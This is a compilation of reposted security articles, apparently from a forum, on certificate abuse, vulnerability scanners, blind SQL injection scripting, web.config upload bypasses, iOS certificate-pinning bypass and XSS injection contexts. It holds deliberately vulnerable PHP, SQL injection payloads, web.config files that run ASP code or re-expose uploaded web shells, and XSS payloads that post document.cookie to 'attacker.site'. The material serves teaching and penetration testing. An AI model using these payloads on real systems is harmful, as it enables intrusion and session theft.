more than 125 digital certificates, comprises SHA-1 fingerprints of each certificate with a description of the abuse. Many entries are associated with popular botnets and malware-based attacks, including Zeus, Shylock and Kins. The SSL Black List is another project that could help the security community to prevent cyber attacks. When the database matures, it will represent a precious resource for security experts dealing with malware and botnet operators that are using certificates in their operations. Abuse.ch isn’t the only entity active in the prevention of illicit activities of certificates. Google is very active in the prevention of any abuse of stolen or unauthorized digital certificates. Earlier this year, the company has its Certificate Transparency Project, a sort of a public register of digital certificates that have been issued. “Specifically, Certificate Transparency makes it possible to detect SSL certificates that have been mistakenly issued by a certificate authority or maliciously acquired from an otherwise unimpeachable certificate authority. It also makes it possible to identify certificate authorities that have gone rogue and are maliciously issuing certificates,” states the official page of the project. Unfortunately, many certificate authorities still aren’t providing logs to the public. References http://www.firmadigitalefacile.it/cosa-e-un-certificato-digitale/ http://securityaffairs.co/wordpress/647/cyber-crime/2011-cas-are-under-attack-why-steal-a-certificate.html http://hackmageddon.com/2011/12/10/another-certification-authority-breached-the-12th/ Turkey - Another story on use of fraudulent digital certificates - Security Affairs | Security Affairs http://securityaffairs.co/wordpress/222/cyber-crime/avoid-control-lets-digitally-sign-malware-code.html http://www.symantec.com/connect/blogs/diginotar-ssl-breach-update Adobe Code Signing Certificate used to sign malware, who to blame? - Security Affairs | Security Affairs SSL Blacklist a new weapon to fight malware and botnet | Security Affairs http://www.darkreading.com/attacks-and-breaches/stolen-digital-certificates-compromised-cia-mi6-tor/d/d-id/1099964? How Attackers Steal Private Keys from Digital Certificates | Symantec Connect How Digital Certificates Are Used and Misused Adobe Code Signing Certificate used to sign malware, who to blame? - Security Affairs | Security Affairs http://securityaffairs.co/wordpress/12264/cyber-crime/bit9-hacked-stolen-digital-certificates-to-sign-malware.html http://files.cloudprivacy.net/ssl-mitm.pdf http://securityaffairs.co/wordpress/4544/hacking/stuxnet-duqu-update-on-cyber-weapons-usage.html http://www.globalsign.com/company/press/090611-security-response.html http://www.wired.com/threatlevel/2011/10/son-of-stuxnet-in-the-wild/ Stuxnet signed certificates frequently asked questions - Securelist http://nakedsecurity.sophos.com/2011/11/03/another-certificate-authority-issues-dangerous-certficates/ http://www.f-secure.com/weblog/archives/00002269.html http://nakedsecurity.sophos.com/2011/12/08/second-dutch-security-firm-hacked-unsecured-phpmyadmin-implicated By Pierluigi Paganini|July 28th, 2014 Sursa: How Cybercrime Exploits Digital Certificates - InfoSec Institute
-
Android Application Secure Design/Secure Coding Guidebook 1. Introduction ................................................................................................................................ 9 1.1. Building a Secure Smartphone Society ................................................................................... 9 1.2. Timely Feedback on a Regular Basis Through the Beta Version ............................................. 10 1.3. Usage Agreement of the Guidebook .................................................................................... 11 2. Composition of the Guidebook .................................................................................................. 12 2.1. Developer's Context ............................................................................................................ 12 2.2. Sample Code, Rule Book, Advanced Topics .......................................................................... 13 2.3. The Scope of the Guidebook ............................................................................................... 16 2.4. Literature on Android Secure Coding ................................................................................... 17 2.5. Steps to Install Sample Codes into Eclipse ........................................................................... 18 3. Basic Knowledge of Secure Design and Secure Coding ............................................................... 34 3.1. Android Application Security ............................................................................................... 34 3.2. Handling Input Data Carefully and Securely ......................................................................... 47 4. Using Technology in a Safe Way ................................................................................................. 49 4.1. Creating/Using Activities .................................................................................................... 49 4.2. Receiving/Sending Broadcasts ............................................................................................. 93 4.3. Creating/Using Content Providers ..................................................................................... 126 4.4. Creating/Using Services .................................................................................................... 175 4.5. Using SQLite ..................................................................................................................... 219 4.6. Handling Files ................................................................................................................... 237 4.7. Using Browsable Intent ...................................................................................................... 264 4.8. Outputting Log to LogCat .................................................................................................. 268 4.9. Using WebView ................................................................................................................. 280 5. How to use Security Functions ................................................................................................. 291 5.1. Creating Password Input Screens ....................................................................................... 291 5.2. Permission and Protection Level ........................................................................................ 306 5.3. Add In-house Accounts to Account Manager ..................................................................... 334 5.4. Communicating via HTTPS ................................................................................................ 353 6. Difficult Problems ................................................................................................................... 375 6.1. Risk of Information Leakage from Clipboard ...................................................................... 375 Download: http://www.jssec.org/dl/android_securecoding_en.pdf
-
Symantec Endpoint Protection 0day In a recent engagement, we had the opportunity to audit a leading Antivirus Endpoint Protection solution, where we found a multitude of vulnerabilities. Some of these made it to CERT, while others have been scheduled for review during our upcoming AWE course at Black Hat 2014, Las Vegas. Ironically, the same software that was meant to protect the organization under review was the reason for its compromise. We’ll be publishing the code for this privilege escalation exploit in the next few days. In the meantime, you can check out our demo video of the exploitation process – best viewed in full screen. [h=5]More shameless Kali Dojo plugs[/h] If you’re attending the Black Hat, Brucon or Derbycon 2014 conferences, don’t forget to come by our free Kali Dojo Workshops for some serious Kali Linux fu. See you there! Sursa: http://www.offensive-security.com/vulndev/symantec-endpoint-protection-0day/
-
Automated vs hybrid vulnerability scanning A CIO’s experience Aleksandr Kirpo, CSO of the credit card processing Ukranian Processing Center You will have heard about programs that perform automated security scanning for website safety assessments. Such scanning software was developed in response to international standards such as PCI DSS and the security requirements they specify. While these scanners may be familiar to e-commerce firms, for owners of businesses where no such standards apply, the idea of security scanners may be new. There are many broadly similar security scanners available as a software or SaaS, and for the uninitiated it can be difficult to understand the differences or their strengths and weaknesses. Further, despite their apparent simplicity, for organisations that do not have a professional information security officer it can be incredibly difficult to make effective use of these systems and the reports they generate. It seems so simple: launch or order the scanner service, get the report and pass it to the development team for bug fixing. So what is the problem? There are actually two: Just like the automated antivirus programs we run on our desktops, automatic website scanners do not always discover all vulnerabilities. That said, if the website is very simple it is likely that the scanner will indeed find all the vulnerabilities, but for more complex websites such effectiveness cannot be guaranteed. Automatic scanners almost always report vulnerabilities that don’t actually exist on the website (false positives). Sadly, the more “clever” a scanner is, the longer it scans and the more false positive results are likely to be reported. So, can you get a report that reveals all the vulnerabilities and excludes false positives? Many IT security standards provide the answer and suggest using code reviews and penetration tests. The only problem with this approach is the price – it can be extremely high. There are few qualified professionals who can conduct code reviews and penetration tests reliably and such professionals are expensive. Not all scanners are created equal During my eighteen years in IT and IT-security, I have made use of many types of security and scanning services and have had the chance to compare the results from automatic scanners, hybrid scanners and penetration testing. Here I share three examples of using website security scanning software. When conducting a website assessment in 2013 we tried web security solutions from both Qualys and High-Tech Bridge. The output of these scans were a report from Qualys (100 pages) and one from High-Tech Bridge’s ImmuniWeb (15 pages). It was easy for me to read and understand each report, but knowing the shortcomings of automated scanners I was aware that the website could have multiple (critical) security vulnerabilities that the automatic scanners would not have found. The two solutions take a totally different approach: while Qualys is a fully automated scanner, High-Tech Bridge’s ImmuniWeb is a hybrid solution where the automated scanner is guided by a real person and completed by manual penetration testing by a security professional. In recent years, we found when scanning websites, that the Qualys scanner would stop responding. If, as we were, you are chasing standards compliance this can be a major headache because you are left without a compliance report or even some information that helps you understand the security level of the site. Of course there is technical support provided by scanner vendors – the last time I needed technical support from Qualys it took me about a month to get the issue resolved. High-Tech Bridge’s Portal support replied within a few hours. On another occasion we assessed a medium-sized website using IBM Rational AppScan. The final document from AppScan came to 850 pages and listed 36 vulnerabilities. Analysing the entire 850 page report and checking the website cost our developers about a month of effort and ultimately they reported that these vulnerabilities were not actually exploitable. Next, we ordered expensive manual penetration testing from a German company, the results of which showed that none of the vulnerabilities reported by AppScan existed and were all false-positives (needless to say, the testing cost a lot of money). Finally, we ordered an ImmuniWeb assessment for 639 USD (now the price is 990 USD). The assessment had only one recommendation, to use a trusted SSL certificate – a recommendation echoed by the developers and testers who conducted the penetration tests. This is a very good example how automated solutions can waste your time and money even if your web applications are safe. How intelligent are security scanners? A security professional reading a report generated by automatic scanners will recognise that the way these scanners work is through pattern matching. What’s wrong with that? Well, it means that any substantial deviation from the template will miss the vulnerability. A website owner should be aware that there are programmers who will leave vulnerabilities in the code on purpose, and some do it in a way that the scanners cannot detect. Even the most advanced automatic scanners need to match against a huge number of templates – this is probably why so many scanners take such a long time to complete a website scan. Pattern matching automated scanners have much in common with antivirus software. With antivirus software, the icon on your computer does not mean that there is no virus on your PC – it just means that the antivirus hasn’t recognised any viruses on your PC. The success of antivirus and automatic scanners depends on many factors such as the relevance of the software and pattern matching databases together with some mechanism for concluding that vulnerabilities (or viruses) are present. So, to be truly effective the fully-automated approach needs to be supplemented by an IT-security expert who can add human intelligence and professional experience to the process and ultimately give confidence that vulnerabilities will not go unnoticed during a security scan. Adding human intelligence is what Swiss company High-Tech Bridge did with its hybrid scanning approach1. Its innovative SaaS called ImmuniWeb combines automated scanning with manual testing – the scanning is done by a program and at the same time the results of the scanner are checked and completed by a professional who is qualified to carry out penetration tests. This expert can refine tasks for scanning immediately based on the website being assessed – eliminating false positive from the scanner report due to the involvement of the expert. Moreover, manual penetration testing guarantees the highest detection rate of vulnerabilities. It is interesting to note that the results of the low-cost hybrid assessment and expensive professional penetration tests, in certain cases, are the same. For example, say an open source based platform is used for the website. The expert is already aware of the known vulnerabilities of the platform at the time of scanning. So in the case of the hybrid approach, the expert need only find out the version of the platform being used and check its settings. Thus, the report will be specific to the platform used and contain only information relating to its vulnerabilities that really exist and are exploitable. If you have decided to check the security of your website quickly and economically, then you need to decide which scanner to choose: automatic with a huge report that in practice is never read until the end of the process or a hybrid with a brief report containing recommendations verified and completed by a security expert. What is the best way to check whether your website is secure? For firms building new websites or updating existing ones, here’s a list of factors to consider: 1. The specification you give to the developer should be prepared with the security in mind. The website developer: Should have good understanding of secure software development lifecycle, Pass regular web security trainings , Perform obligatory code reviews handled internally or by a third party company, Established IT-security processes in the company. Software testing at all stages includes testing for security issues. Ongoing maintenance of the website including improvements and updates, etc. Ensuring a credible and effective response to hacking, DoS, DDoS attacks. The infrastructure of your website should be properly protected. Beware of trusting your server host to secure your website. Hosting companies often make much noise about their security services (usually limited to one or more antivirus and malware-detection programs). However, such measures reduce the risk of an infrastructure breach but are absolutely insufficient for protecting a website as a separate software package. So when you need to check the security of your website, it means that you need scans and penetration tests of your web application not the infrastructure (that is also vital for website security but there is not so much vectors of infrastructure hacking and hardening). By the way, infrastructure security should be fully checked and assured by the hosting company – make sure it is mentioned in your contract. Sursa: Automated vs hybrid vulnerability scanning | ITsecurityITsecurity
-
Writing your own blind SQLi script We all know that sqlmap is a really great tool which has a lot of options that you can tweak and adjust to exploit the SQLi vuln you just found (or that sqlmap found for you). On rare occasions however you might want to just have a small and simple script or you just want to learn how to do it yourself. So let’s see how you could write your own script to exploit a blind SQLi vulnerability. Just to make sure we are all on the same page, here is the blind SQLi definition from OWASP: Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. You can also roughly divide the exploiting techniques in two categories (like owasp does) namely: content based The page output tells you if the query was successful or not [*]time based Based on a time delay you can determine if your query was successful or not Of course you have dozens of variations on the above two techniques, I wrote about one such variation a while ago. For this script we are going to just focus on the basics of the mentioned techniques, if you are more interested in knowing how to find SQLi vulnerabilities you could read my article on Solving RogueCoder’s SQLi challenge. Since we are only focusing on automating a blind sql injection, we will not be building functionality to find SQL injections. Before we even think about sending SQL queries to the servers, let’s first setup the vulnerable environment and try to be a bit realistic about it. Normally this means that you at least have to login, keep your session and then inject. In some cases you might even have to take into account CSRF tokens which depending on the implementation, means you have to parse some HTML before you can send the request. This will however be out of scope for this blog entry. If you want to know how you could parse HTML with python you could take a look at my credential scavenger entry. If you just want the scripts you can find them in the example_bsqli_scripts repository on my github, since this is an entry on how you could write your own scripts all the values are hard coded in the script. The vulnerable environment Since we are doing this for learning purposes anyways, let’s create almost everything from scratch: sudo apt-get install mysql-server mysql-client sudo apt-get install php5-mysql sudo apt-get install apache2 libapache2-mod-php5 Now let’s write some vulnerable code and abuse the mysql database and it’s tables for our vulnerable script, which saves us the trouble of creating a test database. pwnme-plain.php <?php$username = "root"; $password = "root"; $link = mysql_connect('localhost',$username,$password); if(!$link){ die(mysql_error()); } if(!mysql_select_db("mysql",$link)){ die(mysql_error()); } $result = mysql_query("select user,host from user where user='" . $_GET['name'] . "'",$link); echo "<html><body>"; if(mysql_num_rows($result) > 0){ echo "User exists<br/>"; }else{ echo "User does not exist<br/>"; } if($_GET['debug'] === "1"){ while ($row = mysql_fetch_assoc($result)){ echo $row['user'] . ":" . $row['host'] . "<br/>"; } } echo "</html></body>"; mysql_free_result($result); mysql_close($link); ?> Like you can see if you give it a valid username it will say the user exists and if you don’t give it a valid username it will tell you the user doesn’t exist. If you need more information you can append a debug flag to get actual output. You probably also spotted the SQL injection which you can for example exploit like this: http://localhost/pwnme-plain.php?name=x' union select 1,2--+ Which results in the output: User exists and if you mess up the query or the query doesn’t return any row it will result in: User does not exist Sending and receiving data We are going to use the python package requests for this. If you haven’t heard it yet, it makes working with http stuff even easier than urllib2. If you happen to encounter weird errors with the requests library you might want to install the library yourself instead of using the one provided by your distro. To make a request using GET and getting the page content you’d use: print requests.get("http://localhost/pwnme-plain.php").text If you want to pass in parameters you’d do it like: urlparams = {'name':'root'} print requests.get("http://localhost/pwnme-plain.php",parameters=urlparams).text Which ensures that the parameters are automatically encoded. To make a request using POST you’d use: postdata = {'user':'webuser','pass':'webpass'} print requests.post("http://localhost/pwnme-login.php",data=postdata).text That’s all you need to start sending your SQLi payload and receiving the response. Content based automation For content based automation you basically need a query which will change the content based on the output of the query. You can do this in a lot of ways, here are two example: display or don’t display content id=1 and 1=if(substring((select @@version),1,1)=5,1,2) [*]display content based on the query output id=1 + substring((select @@version),1,1) For our automation script we will choose the first way of automating it, since it depends less on the available content. The first thing you need is a “universal” query which you use as the base to execute all your other queries. In our case this could be: root’ and 1=if(({PLACEHOLDER})=PLACEHOLDERVAR,1,2)–+ With the above query we can decide what we want to display. If you want display the wrong content we have to replace the PLACEHOLDER text and PLACEHOLDERVAR with something that will make the ‘if clause’ to choose ‘2’, for example: root’ and 1=if(substring((select @@version),1,1)=20,1,2)–+ Since there is no mysql version 20 this will lead to a query that ends up being evaluated as: root’ and 1=2 Which results in a False result, thus displaying the wrong content, in our case ‘User does not exist’. If on the other hand we want the query to display the good content we can just change it to: root’ and 1=if(substring((select @@version),1,1)=5,1,2)–+ Which of course will end up as: root’ and 1=1 Articol complet: Writing your own blind SQLi script | DiabloHorn
-
[h=1]Upload a web.config File for Fun & Profit[/h] The web.config file plays an important role in storing IIS7 (and higher) settings. It is very similar to a .htaccess file in Apache web server. Uploading a .htaccess file to bypass protections around the uploaded files is a known technique. Some interesting examples of this technique are accessible via the following GitHub repository: https://github.com/wireghoul/htshells In IIS7 (and higher), it is possible to do similar tricks by uploading or making a web.config file. A few of these tricks might even be applicable to IIS6 with some minor changes. The techniques below show some different web.config files that can be used to bypass protections around the file uploaders. [h=2]Running web.config as an ASP file[/h] Sometimes IIS supports ASP files but it is not possible to upload any file with .ASP extension. In this case, it is possible to use a web.config file directly to run ASP classic codes: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- ASP code comes here! It should not include HTML comment closing tag and double dashes! <% Response.write("-"&"->") ' it is running the ASP code if you can see 3 by opening the web.config file! Response.write(1+2) Response.write("<!-"&"-") %> --> [h=2]Removing protections of hidden segments[/h] Sometimes file uploaders rely on Hidden Segments of IIS Request Filtering such as APP_Data or App_GlobalResources directories to make the uploaded files inaccessible directly. However, this method can be bypassed by removing the hidden segments by using the following web.config file: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <security> <requestFiltering> <hiddenSegments> <remove segment="bin" /> <remove segment="App_code" /> <remove segment="App_GlobalResources" /> <remove segment="App_LocalResources" /> <remove segment="App_Browsers" /> <remove segment="App_WebReferences" /> <remove segment="App_Data" /> <!--Other IIS hidden segments can be listed here --> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> Now, an uploaded web shell file can be directly accessible. [h=2]Creating XSS vulnerability in IIS default error page[/h] Often attackers want to make a website vulnerable to cross-site scripting by abusing the file upload feature. The handler name of IIS default error page is vulnerable to cross-site scripting which can be exploited by uploading a web.config file that contains an invalid handler name (does not work in IIS 6 or below): <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers> <!-- XSS by using *.config --> <add name="web_config_xss<script>alert('xss1')</script>" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="fooo" resourceType="Unspecified" requireAccess="None" preCondition="bitness64" /> <!-- XSS by using *.test --> <add name="test_xss<script>alert('xss2')</script>" path="*.test" verb="*" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> <httpErrors existingResponse="Replace" errorMode="Detailed" /> </system.webServer> </configuration> [h=2]Other techniques[/h] Rewriting or creating the web.config file can lead to a major security flaw. In addition to the above scenarios, different web.config files can be used in different situations. I have listed some other examples below (a relevant web.config syntax can be easily found by searching in Google): Re-enabling .Net extensions: When .Net extensions such as .ASPX are blocked in the upload folder. Using an allowed extension to run as another extension: When ASP, PHP, or other extensions are installed on the server but they are not allowed in the upload directory. Abusing error pages or URL rewrite rules to redirect users or deface the website: When the uploaded files such as PDF or JavaScript files are in use directly by the users. Manipulating MIME types of uploaded files: When it is not possible to upload a HTML file (or other sensitive client-side files) or when IIS MIME types table is restricted to certain extensions. [h=2]Targeting more users via client-side attacks[/h] Files that have already been uploaded to the website and have been used in different places can be replaced with other contents by using the web.config file. As a result, an attacker can potentially target more users to exploit client-side issues such as XSS or cross-site data hijacking by replacing or redirecting the existent uploaded files. [h=2]Additional Tricks[/h] Sometimes it is not possible to upload or create a web.config file directly. In this case, copy, move, or rename functionality of the web application can be abused to create a web.config file. Alternate Data Stream feature can also be useful for this purpose. For example, “web.config::$DATA” can create a web.config file with the uploaded file contents, or “web.config:.txt” can be used to create an empty web.config file; and when a web.config file is available in the upload folder, Windows 8.3 filename (“WEB~1.con”) or PHP on IIS feature (“web<<”) can be used to point at the web.config file. Sursa: https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
-
Bypass iOS Version Check and Certification validation 7/28/2014 | NetsPWN Certain iOS applications check for the iOS version number of the device. Recently, during testing of a particular application, I encountered an iOS application that was checking for iOS version 7.1. If version 7.1 was not being used, the application would not install on the device and would throw an error. This blog is divided into three parts: Change version number value in SystemVersion.plist file Change version number value in plist file present in iOS application ipa. Use 'iOS-ssl-Kill switch' tool to bypass certificate validation. Change version number value in SystemVersion.plist file The version of the iOS device can be faked (on a jailbroken device) in two simple steps by changing the value in the SystemVersion.plist file: SSH into a jailbroken device (or use ifile, available on cydia) to browse through the system folder. Change the 'ProductVersion' value in the '/System/Library/CoreServices/SystemVersion.plist' file to the desired iOS version. Fig 1: iOS version can be faked by changing the value of ProductVersion key. This will change the version number displayed in version tab located in 'Settings/General/about' in the iOS device. Although this trick might work on some of the applications that check for the value saved in the '/System/Library/CoreServices/SystemVersion.plist' file, this trick won't work on every application. If it fails, we can use the second method given below. Change version number value in plist file present in iOS application ipa. If you are unsure about the method that the application is using to look for the version number, then we can use another simple trick to change the value in the iOS version. The version check in an IPA can be faked in three simple steps. Rename the ipa to .zip file and extract the folder. Find the info.plist file located usually in \Payload\appname.app and change the string 'minimum ios version' to the version you need Zip the file again and change it to ipa. [Note: Some of the applications can also use other plist files instead of the info.plist file to check for minimum version] Fig 2: MinimumOSVersion requirement defined in info.plist file in the IOS application. Manipulating any file inside the IPA will break the signature. So, to fix this problem, the IPA would need to be resigned. We can use the tool given here on Christoph Ketzler's blog. Some applications also perform the version check during the installation process. When a user tries to install the application using iTunes, or xcode using the IPA, the IPA checks for the version of iOS running on that device and if the version is lower than the minimum required version it will throw an error similar to the one given below. Fig 3: Error message while installing the application using xcode. The version check performed during the installation stage can be bypassed using this simple trick: Rename the .ipa application package to .zip and then extract the .app folder. Copy the .app folder to the path where iOS applications are installed (/root/application) using an SFTP client like WinSCP. SSH into the device and browse to the folder where the IPA is installed, then change the permission of the .app folder to executable (chmod -R 755 or chmod -R 777). Alternately you can change the permissions by right clicking the .app in WinSCP, change properties and check all the read, write, and execute permissions. Restart the iOS device and the application will be successfully installed. Fig 4: Changing permissions of the IPA to executable. iOS Certification validation bypass Some applications perform certification validation. Certification validation is performed to prevent application traffic from being proxied using a MitM proxy like Burp. Typically the application has a client certificate hard coded into the binary (i.e. the application itself). The server checks for this client certificate and if it does not match then it throws a certificate validation error. Refer to my co-worker Steve Kern's blog on Certificate Pinning in a Mobile Application for further details. Sometimes it is difficult to extract the certificate from the application and install it into the proxy. An alternative approach is to use a tool developed by iSEC Partners called ios-ssl-kill-switch. This tool hooks into the Secure Transport API, which is the lowest level of API, and disables the check for certificate validation. Most certificate validation techniques use NSURLConnection, which is a higher level API call to validate client certificates. More technical details can be found here. Bypassing Certificate validation can be performed in the following steps: Install the tool kill-ssl-switch Make sure the dependencies given on the installation page are installed prior to the installation of the software. Restart the device or restart SpringBoard using following command 'killall -HUP SpringBoard' Enable the Disable Certificate Validation Option in 'Settings/SSL Kill Switch' Restart the application and confirm that a MitM proxy can intercept the traffic successfully. Certificate pinning can be bypassed by hooking into the API which makes the check for certificate validation and return a true value for certificate validated all the time. Mobilesubstrate is a useful framework for writing tweaks for disabling certificate pinning checks. There are few other handy tools as well, like 'Trustme' by Intrepidusgroup and 'Snoop-it' by Nesolabs to disable Certificate pinning. Fig 5: Turn off certificate validation using SSL Kill Switch. Sursa: https://www.netspi.com/blog/entryid/236/bypass-ios-version-check-and-certification-validation
-
Using SSL Certificates with HAProxy Posted 2014/07/29 I'm writing an eBook Servers for Hackers! Check out the page for more information - it should be out in early September. Overview If your application makes use of SSL certificates, then some decisions need to be made about how to use them with a load balancer. A simple setup of one server usually sees a client's SSL connection being decrypted by the server receiving the request. Because a load balancer sits between a client and one or more servers, where the SSL connection is decrypted becomes a concern. There are two main strategies. SSL Termination is the practice of terminating/decrypting an SSL connection at the load balancer, and sending unencrypted connections to the backend servers. This means the load balancer is responsible for decrypting an SSL connection - a slow and CPU intensive process relative to accepting non-SSL requests. This is the opposite of SSL Pass-Through, which sends SSL connections directly to the proxied servers. With SSL-Pass-Through, the SSL connection is terminated at each proxied server, distributing the CPU load across those servers. However, you lose the ability to add or edit HTTP headers, as the connection is simply routed through the load balancer to the proxied servers. This means your application servers will lose the ability to get the X-Forwarded-* headers, which may include the client's IP address, port and scheme used. Which strategy you choose is up to you and your application needs. SSL Termination is the most typical I've seen, but pass-thru is likely more secure. There is a combination of the two strategies, where SSL connections are terminated at the load balancer, adjusted as needed, and then proxied off to the backend servers as a new SSL connection. This may provide the best of both security and ability to send the client's information. The trade off is more CPU power being used all-around, and a little more complexity in configuration. An older article of mine on the consequences and gotchas of using load balancers explains these issues (and more) as well. Articol: Using SSL Certificates with HAProxy | Servers for Hackers
-
Contexts and Cross-site Scripting - a brief intro Yesterday Anant posted a question in the IronWASP Facebook group asking about the different potential contexts related to XSS to better understand how context specific filtering is done. It would be hard to post the response in a comment so I am turning it in to a blog post instead.If you are the kind of person who likes reading code instead of text then download the source code of IronWASP and check out the CrossSiteScriptingCheck.cs file in the ActivePlugins directory, this post is based on the logic IronWASP uses for its XSS check. If user controlled input appears in some part of a web page and if this behaviour leads to the security of the site getting compromised in someway then the page is said to be affected by Cross-site Scripting. A web page is nothing but just text, the browser however does not look at it as a single monolithic blob of text, instead different sections of the page could be interpreted differently by the browser as HTML, CSS or JavaScript. Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact that user input appearing in the page can have would depend on the context in which the browser tries to interpret the user input. I will try to list out the different contexts in which user input can occur in a web page. 1) Simple HTML Context In the body of an existing HTML tag or at the start and end of the page outside of the <html> tag. <some_html_tag> user_input </some_html_tag> In this context you can enter any kind of valid HTML in the user input and it would immediately be rendered by the browser, its an executable context. Eg: <img src=x onerror=alert(1)> 2) HTML Attribute Name Context Inside the opening HTML tag, after tag name or after an attribute value. <some_html_tag user_input some_attribute_name="some_attribute_value"/> In this context you can enter an event handler name and JavaScript code following an = symbol and we can have code execution, it can be considered to be an executable context. Eg: onclick="alert(1)" 3) HTML Attribute Value Context Inside the opening HTML tag, after an attribute name separated by an = symbol. <some_html_tag some_attribute_name="user_input" /> <some_html_tag some_attribute_name='user_input' /> <some_html_tag some_attribute_name=user_input /> There are three variations of this context: - Double quoted attribute - Single quoted attribute - Quote less attribute Code execution in this context would depend on the type of attribute in which the input appears. There are different types of attributes: a) Event attributes These are attributes like onclick, onload etc and the values of these attributes are executed as JavaScript. So anything here is the same as JavaScript context. URL attributes These are attributes that take URL as a value, for example src attribute of different tags. Entering a JavaScript URL here could lead to JavaScript execution Eg: javascript:some_javascript() c) Special URL attributes These are URL attributes where entering a regular URL can lead to security issues. Some examples are: <script src="user_input" <iframe src="user_input" <frame src="user_input" <link href="user_input" <object data="user_input" <embed src="user_input" <form action="user_input" <button formaction="user_input" <base href="user_input" <a href="user_input" Entering just an absolute http or https URL in these cases could affect the security of the website. In some cases if it is possible to upload user controlled data on to the server then even entering relative URLs here would lead to a problem. Some sites might strip off http:// and https:// from the values entered in these attributes to prevent absolute URLs from being entered but there are many ways in which an absolute URL can be specified. d) META tag attributes Meta tags like Charset can be influence how the contents of the page are interpreted by the browser. And then there is the http-equiv attribute, it can emulating the behaviour of HTTP response headers. Influencing the values of headers like Content-Type, Set-Cookie etc will have impact on the security of the page. e) Normal attributes If the input appears in a normal attribute value then this context must be escaped to lead to code execution. If the attribute is quoted then the corresponding quote must be used to escape the context. In case of unquoted attributes space or backslash should do the job. Once out of this context a new event handler can be added to lead to code execution. Eg: " onclick=alert(1) ' onclick=alert(1) onclick=alert(1) 4) HTML Comments Context Inside the comments section of HTML <!-- some_comment user_input some_comment --> This is a non-executable context and it is required to come out this context to execute code. Entering a --> would terminate this context and switch any subsequent text to HTML context. Eg: --><img src=x onerror=alert(1)> 5) JavaScript Context Inside the JavaScript code portions of the page. <script> some_javascript user_input some_javascript </script> This applies to the section enclosed by the SCRIPT tags, in event handler attributes values and in URLs preceding with javascript: . Inside JavaScript user input could appear in the following contexts: a) Code context Single quoted string context c) Double quoted string context d) Single line comment context e) Multi-line comment context f) Strings being assigned to Executable Sinks If user input is between SCRIPT tags then, no matter in which of the above contexts it appears you can switch to the HTML context simply by including a closing SCRIPT tag and then insert any HTML. Eg: </script><img src=x onerror=alert(1)> If you are not going to switch to HTML context then you have to tailor the input depending on the specific JavaScript context it appears in. a) Code Context function dev_func(input) {some_js_code} dev_func(user_input); some_variable=123; This is an executable context, user input directly appears as an expression and you can directly enter JavaScript statements and they will be executed. Eg: $.post("http://attacker.site", {'cookie':document.cookie}, function(){})// Single quoted string context var some_variable='user_input'; This is a non-executable context and the user input must include a single quote at the beginning to switch out of the string context and enter the code context.. Eg: '; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})// c) Double quoted string context var some_variable="user_input"; This is a non-executable context and the user input must include a double quote at the beginning to switch out of the string context and enter the code context.. Eg: "; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})// d) Single-line comment context some_js_func();//user_input This is a non-executable context and the user input must include a new line character to terminate the single line comment context and switch to the code context.. Eg: \r\n$.post("http://attacker.site", {'cookie':document.cookie}, function(){})// e) Multi-line comment context some_js_func(); /* user_input */ some_js_code This is a non-executable context and the user input must include*/ to terminate the multi-line comment context and switch to the code context.. Eg: */$.post("http://attacker.site", {'cookie':document.cookie}, function(){})// f) Strings being assigned to Executable Sinks These are single quoted or double quoted string contexts but the twist is that these strings are passed to a function or assigned to a property that would treat this string as executable code. Some examples are: eval("user_input"); location = "user_input"; setTimeout(1000, "user_input"); x.innerHTML = "user_input"; For more sinks refer the DOM XSS wiki. This should be treated similar to Code context. 6) VB Script Context This is very rare these days but still there might that odd site that uses VBScript. <script language="vbscript" type="text/vbscript"> some_vbscript user_input some_vbscript </script> Like JavaScript, you could switch out to HTML context with the </SCRIPT> tag. Inside VBScript user input could appear in the following contexts: a) Code context Single-line comment c) Double quoted string context d) Strings being assigned to Executable Sinks a) Code Context Similar to its JavaScript equivalent, you can directly enter VBScript Single-line comment VBScript only has single-line comments and similar to its JavaScript equivalent entering a new line character will terminate the comment context and switch to code context c) Double quoted string Similar to its JavaScript equivalent d) Strings being assigned to Executable Sinks Similar to its JavaScript equivalent 7) CSS Context Inside the CSS code portions of the page. <style> some_css user_input some_css </style> This applies to the section enclosed by the STYLE tags and in style attributes values. Injecting CSS in to a page itself could have some kind of impact of the page. For example, by changing the location, visibility, size and z-index of the elements in a page it might be possible to make the user perform an action different from what they think they are doing. But the more interesting aspect is in how JavaScript can be executed from within CSS. Though, not possible in modern browsers older browser did support JavaScript execution in two ways. i. expression property expression is a Internet Explorer only feature that allows execution of JavaScript embedding inside CSS. css_selector { property_name: expression(some_javascript); } ii. JavaScript URLs Some CSS properties like the background-image property take an URL as their value. In older browsers, entering a JavaScript URL here would result in JavaScript code being executed. css_selector { background-image: javascript:some_javascript() } Inside CSS user input could appear in the following contexts: a) Statement context Single quoted/Double quoted string context c) Multi-line comment context d) Strings being assigned to Executable Sinks Similar to the SCRIPT tag, if user input is between STYLE tags then you can switch to the HTML context simply by including a closing STYLE tag and then insert any HTML. Eg: </script><img src=x onerror=alert(1)> If you are not going to switch to HTML context then you have to tailor the input depending on the specific JavaScript context it appears in. a) Statement Context In this context you can directly start including CSS to modify the page for a social engineering attack or make use of expression property or the JavaScript URL method to inject JavaScript code. Single quoted/Double quoted string context Including a single or double quote at the start of the input would terminate the string context and switch to statement context. c) Multi-line comment context Similar to JavaScript multi-line comment, entering */ would 